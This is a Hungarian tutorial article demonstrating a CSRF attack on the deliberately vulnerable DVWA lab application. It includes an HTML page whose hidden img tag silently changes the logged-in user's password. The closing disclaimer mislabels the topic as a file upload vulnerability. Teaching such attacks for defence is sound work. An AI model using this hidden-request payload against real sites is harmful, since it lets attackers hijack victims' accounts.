WebElektronika

Felhívjuk az Olvasók figyelmét arra, hogy ez a cikk azért született meg, hogy a saját fejlesztésű webes alkalmazások biztonságosabbak legyenek. Nem célunk, és határozottan elzárkózunk attól, hogy segítsünk bárkinek számítógépes bűncselekmények elkövetésében.

Ennek a támadási módnak a hátterében az áll, hogy egy adott weboldal a kérés kiszolgálásakor több honlapról, domainről állítja elő a tartalmat. Ez egészen addig nem gond, amíg a kliensoldali felhasználó nem jelentkezik be az adott honlapra. Amikor a felhasználó bejelentkezik a vizsgált webes alkalmazásba, akkor a weboldal a különböző domaineknek küldött kérésekben elküldi az adott munkamenethez tartozó cookie-kat is.

Az általunk használt DVWA tesztalkalmazásnál ezt a támadási módot úgy lehet bemutatni, hogy a támadó eltéríti a jelszó megváltoztatásához elküldött GET kérést. (Természetesen a modern webes alkalmazások már nem GET, hanem POST kérésekben küldi el a jelszó megváltoztatásához szükséges kéréseket, de a DVWA alkalmazás LOW szintjénél a GET kerül alkalmazásra.)

Alacsony szintű DVWA beállításnál a CSRF sérülékenység egyszerűen kihasználható, demonstrálható úgy, hogy a jelszó könnyedén megváltoztatható. 

Először navigáljunk el a következő URL-re, ahol a DVWA tesztalkalmazás CSRF sérülékenysége található.

http://192.168.56.102/DVWA-master/vulnerabilities/csrf/

Az ekkor felbukkanó ablaknál adjunk meg egy új jelszót (1. ábra).

1. ábra   Jelszó megváltozatása a DVWA-master alkalmazásnál
 

Amikor a "Change" nyomógombra kattintunk, akkor beállításra kerül az új jelszó, illetve az URL a következő lesz:

http://192.168.56.102/DVWA-master/vulnerabilities/csrf/?password_new=jelszo&password_conf=jelszo&Change=Change#

Most hozzunk létre egy html file-t a következő tartalommal:

<html>
<head>
</head>
<body>
<h3>ez egy tesztoldal</h3>
<img style="display:none" src="http://192.168.56.102/DVWA-master/vulnerabilities/csrf/?password_new=htmljelszo&password_conf=htmljelszo&Change=Change" alt"" />
</body>
</html>

Most indítsuk el ezt a file-t egy böngészőben (2. ábra), és látható, hogy kiírtuk "h3" címként a tesztszöveget. Ugyanakkor nem látjuk azt a képet, amelynek a forrása a korábban látott URL, benne az új jelszóval.

2. ábra   Jelszó megváltoztatása egy HTML oldal segítségével
 

Látható tehát az, hogy a DVWA alkalmazáson kívül is meg tudjuk változtatni a jelszót úgy, akár az URL paramétereit módosítjuk, vagy készíthetünk egy olyan HTML file-t, amelyben egy képnek a forrásaként adjuk meg a kérdéses URL-t.

Még egyszer felhívjuk az Olvasók figyelmét arra, hogy ez a cikk azért született meg, hogy rámutassunk a filefeltöltés sérülékenység veszélyére, és az ellene való védekezés fontosságára. Határozottan elhatárolódunk bármilyen bűncselekmény elkövetésének a segítésében.

Az információs rendszer vagy adat megsértése bűncselekmény (423. §).